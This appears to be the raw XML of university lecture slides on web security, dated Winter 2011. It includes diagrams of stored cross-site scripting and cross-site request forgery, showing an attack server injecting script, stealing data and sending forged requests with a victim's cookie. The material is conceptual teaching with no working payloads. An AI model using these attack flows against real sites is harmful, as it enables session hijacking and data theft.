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750" r:id="rId2"/>
    <p:sldMasterId id="2147483778" r:id="rId3"/>
    <p:sldMasterId id="2147483792" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId75"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId76"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="560" r:id="rId5"/>
    <p:sldId id="562" r:id="rId6"/>
    <p:sldId id="568" r:id="rId7"/>
    <p:sldId id="569" r:id="rId8"/>
    <p:sldId id="658" r:id="rId9"/>
    <p:sldId id="659" r:id="rId10"/>
    <p:sldId id="660" r:id="rId11"/>
    <p:sldId id="684" r:id="rId12"/>
    <p:sldId id="685" r:id="rId13"/>
    <p:sldId id="686" r:id="rId14"/>
    <p:sldId id="663" r:id="rId15"/>
    <p:sldId id="664" r:id="rId16"/>
    <p:sldId id="666" r:id="rId17"/>
    <p:sldId id="683" r:id="rId18"/>
    <p:sldId id="669" r:id="rId19"/>
    <p:sldId id="656" r:id="rId20"/>
    <p:sldId id="597" r:id="rId21"/>
    <p:sldId id="599" r:id="rId22"/>
    <p:sldId id="600" r:id="rId23"/>
    <p:sldId id="601" r:id="rId24"/>
    <p:sldId id="565" r:id="rId25"/>
    <p:sldId id="588" r:id="rId26"/>
    <p:sldId id="602" r:id="rId27"/>
    <p:sldId id="604" r:id="rId28"/>
    <p:sldId id="587" r:id="rId29"/>
    <p:sldId id="594" r:id="rId30"/>
    <p:sldId id="603" r:id="rId31"/>
    <p:sldId id="563" r:id="rId32"/>
    <p:sldId id="595" r:id="rId33"/>
    <p:sldId id="607" r:id="rId34"/>
    <p:sldId id="610" r:id="rId35"/>
    <p:sldId id="611" r:id="rId36"/>
    <p:sldId id="612" r:id="rId37"/>
    <p:sldId id="564" r:id="rId38"/>
    <p:sldId id="614" r:id="rId39"/>
    <p:sldId id="625" r:id="rId40"/>
    <p:sldId id="616" r:id="rId41"/>
    <p:sldId id="617" r:id="rId42"/>
    <p:sldId id="624" r:id="rId43"/>
    <p:sldId id="618" r:id="rId44"/>
    <p:sldId id="619" r:id="rId45"/>
    <p:sldId id="620" r:id="rId46"/>
    <p:sldId id="621" r:id="rId47"/>
    <p:sldId id="622" r:id="rId48"/>
    <p:sldId id="623" r:id="rId49"/>
    <p:sldId id="626" r:id="rId50"/>
    <p:sldId id="627" r:id="rId51"/>
    <p:sldId id="628" r:id="rId52"/>
    <p:sldId id="629" r:id="rId53"/>
    <p:sldId id="631" r:id="rId54"/>
    <p:sldId id="644" r:id="rId55"/>
    <p:sldId id="645" r:id="rId56"/>
    <p:sldId id="646" r:id="rId57"/>
    <p:sldId id="647" r:id="rId58"/>
    <p:sldId id="649" r:id="rId59"/>
    <p:sldId id="632" r:id="rId60"/>
    <p:sldId id="633" r:id="rId61"/>
    <p:sldId id="634" r:id="rId62"/>
    <p:sldId id="636" r:id="rId63"/>
    <p:sldId id="637" r:id="rId64"/>
    <p:sldId id="638" r:id="rId65"/>
    <p:sldId id="639" r:id="rId66"/>
    <p:sldId id="640" r:id="rId67"/>
    <p:sldId id="641" r:id="rId68"/>
    <p:sldId id="642" r:id="rId69"/>
    <p:sldId id="689" r:id="rId70"/>
    <p:sldId id="687" r:id="rId71"/>
    <p:sldId id="688" r:id="rId72"/>
    <p:sldId id="657" r:id="rId73"/>
    <p:sldId id="643" r:id="rId7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7" autoAdjust="0"/>
    <p:restoredTop sz="94592" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="942" y="8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D74864-EB05-49AA-BA59-F6F5B3173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1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5E1360-550A-4529-B4D2-5DC013EF6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9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6C6A965A-ACD5-4A3F-ADC5-CAF86F6BCB51}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200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4844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46BF2-BDC9-4A46-8C6B-5725797173F9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9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4143881" y="9119857"/>
            <a:ext cx="3169705" cy="47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5" rIns="96651" bIns="48325" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{EB7EED29-BC83-4F7A-BF0D-F9A0B1D3E2CF}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r"/>
              <a:t>43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4262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4143881" y="9119857"/>
            <a:ext cx="3169705" cy="47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5" rIns="96651" bIns="48325" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{5DCFB259-B646-486A-8557-3CA54B84E6E7}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r"/>
              <a:t>44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38839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D8FEA-7778-4676-91F7-45872229C0A7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>59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Personalization:  NY Times says “Hi Fred”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="867941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F24E3-66CE-4EAD-839D-070122A087E4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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HttpOnly in IE can be written to by script, but cannot be read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150156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CE478-A8F0-4A48-9704-0207FAF3866A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134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HttpOnly in IE can be written to by script, but cannot be read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117048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D8F60AA1-4A90-48DC-BEF0-CB42F8058452}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200"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531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B4C7B-B852-4000-BA8B-C9DA288BA792}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18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385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C24E73DC-F075-4293-9626-6E109DDD83F6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"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672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Allowscriptaccess:   alows flash object to communicate with external scripts, navigate frames, and open windows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67274-9BDE-4C79-90CE-228DCCF141ED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77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568ED943-A644-4C17-8A4D-0F3838B180B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="966788"/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7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673BA8A2-3806-44CB-8868-D0DD35F11572}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"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767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81CE-79EE-4B91-90B2-53CD43D08136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521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53FFE947-B96B-4BD9-9503-1AFDA9018BFF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"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646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20C872-3BC4-4E8F-8435-60B84CF2B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69060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4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069062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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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069113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5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69115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6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7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8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1069120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1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2" name="Arc 1090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69125" name="Rectangle 109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6" name="Rectangle 109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7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E448B4-4CCC-4564-AAC6-8BAFB71823A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0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524000"/>
            <a:ext cx="8001000" cy="5257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69060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4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069062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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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069113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5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69115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6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7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8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1069120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1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2" name="Arc 1090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69125" name="Rectangle 109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6" name="Rectangle 109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7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E448B4-4CCC-4564-AAC6-8BAFB71823A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0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524000"/>
            <a:ext cx="8001000" cy="5257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69060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4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069062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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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069113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5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69115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6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7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8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1069120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1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2" name="Arc 1090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69125" name="Rectangle 109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6" name="Rectangle 109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7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E448B4-4CCC-4564-AAC6-8BAFB71823A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0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524000"/>
            <a:ext cx="8001000" cy="5257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8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-7620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809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6809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-7620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809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6809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-7620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809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6809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1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3.png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Security Model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147638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C259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477000" y="147638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Winter  2011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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25603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01913"/>
            <a:ext cx="1436688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9475" y="4979988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4188" y="1905000"/>
            <a:ext cx="24368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943600" y="1524000"/>
            <a:ext cx="1693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Attack Server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5562600" y="4552950"/>
            <a:ext cx="1760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Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25608" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5576887" y="3652838"/>
            <a:ext cx="1801813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228600" y="3886200"/>
            <a:ext cx="1465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User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25610" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3276600"/>
            <a:ext cx="17208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Inject malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25611" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990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2" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3036888" y="4067175"/>
            <a:ext cx="2141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request content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25613" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2311400" y="4568825"/>
            <a:ext cx="2932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receive malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25614" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6750050" y="2865438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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25615" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1039646">
            <a:off x="2713038" y="3703638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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25616" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2084388" y="408622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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25617" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="11620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25618" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2205038"/>
            <a:ext cx="3211512" cy="6873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9" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2759075" y="2060575"/>
            <a:ext cx="230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steal valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25620" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-713606">
            <a:off x="2438400" y="235902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4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752600" y="3457575"/>
            <a:ext cx="6726238" cy="1590675"/>
            <a:chOff x="1752600" y="3457525"/>
            <a:chExt cx="6726237" cy="1590725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5943599" y="3457525"/>
              <a:ext cx="2535238" cy="4000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40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Store bad stuff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1752600" y="4648187"/>
              <a:ext cx="2535238" cy="4000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40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Download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51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CSRF: sessions use cookies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1219200" y="2286000"/>
            <a:ext cx="14478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6172200" y="2286000"/>
            <a:ext cx="14478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093" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6388100" y="1785938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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89094" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1319213" y="1785938"/>
            <a:ext cx="127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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89095" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="2438400"/>
            <a:ext cx="426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096" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="345248">
            <a:off x="3416300" y="2209800"/>
            <a:ext cx="214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POST/login.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89097" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="4943475"/>
            <a:ext cx="426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098" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2667000" y="3581400"/>
            <a:ext cx="426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099" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2667000" y="5791200"/>
            <a:ext cx="426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9100" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="2651125" y="3276600"/>
            <a:ext cx="356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Set-cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89101" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="404233">
            <a:off x="3168650" y="4608513"/>
            <a:ext cx="26130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GET…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc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Cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89102" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="3856038" y="5591175"/>
            <a:ext cx="1195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225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CSRF: basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>picture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CB60230-26B2-4122-A0D0-AB77677FE647}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79876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74963"/>
            <a:ext cx="1436688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538" y="1855788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5173663"/>
            <a:ext cx="243681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9" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5713413" y="4792663"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90120" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5554663" y="1428750"/>
            <a:ext cx="1760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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79881" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2427288" y="2257425"/>
            <a:ext cx="2830512" cy="6175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90122" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="4248150"/>
            <a:ext cx="1465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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90123" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2763838" y="2070100"/>
            <a:ext cx="2068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establish session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79884" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="1828800" y="4572000"/>
            <a:ext cx="2906713" cy="10668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125" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2655888" y="2786063"/>
            <a:ext cx="2449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0458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79886" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990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127" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3011488" y="4298950"/>
            <a:ext cx="3076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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>visit server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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90128" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2197100" y="4702175"/>
            <a:ext cx="2932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receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90129" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2378075" y="230187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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90130" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2759075" y="37338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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90131" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="1952625" y="415925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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79892" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="2963863"/>
            <a:ext cx="2830513" cy="6175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133" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="31242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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90134" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="6248400"/>
            <a:ext cx="5310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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Q: how long do you stay logged on to Gmail?</a:t>
            </a:r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 rot="-743562">
            <a:off x="4022725" y="3097213"/>
            <a:ext cx="1212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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(w/ cookie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29802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post with cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81923" name="Picture 12" descr="basic-csrf-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1462088"/>
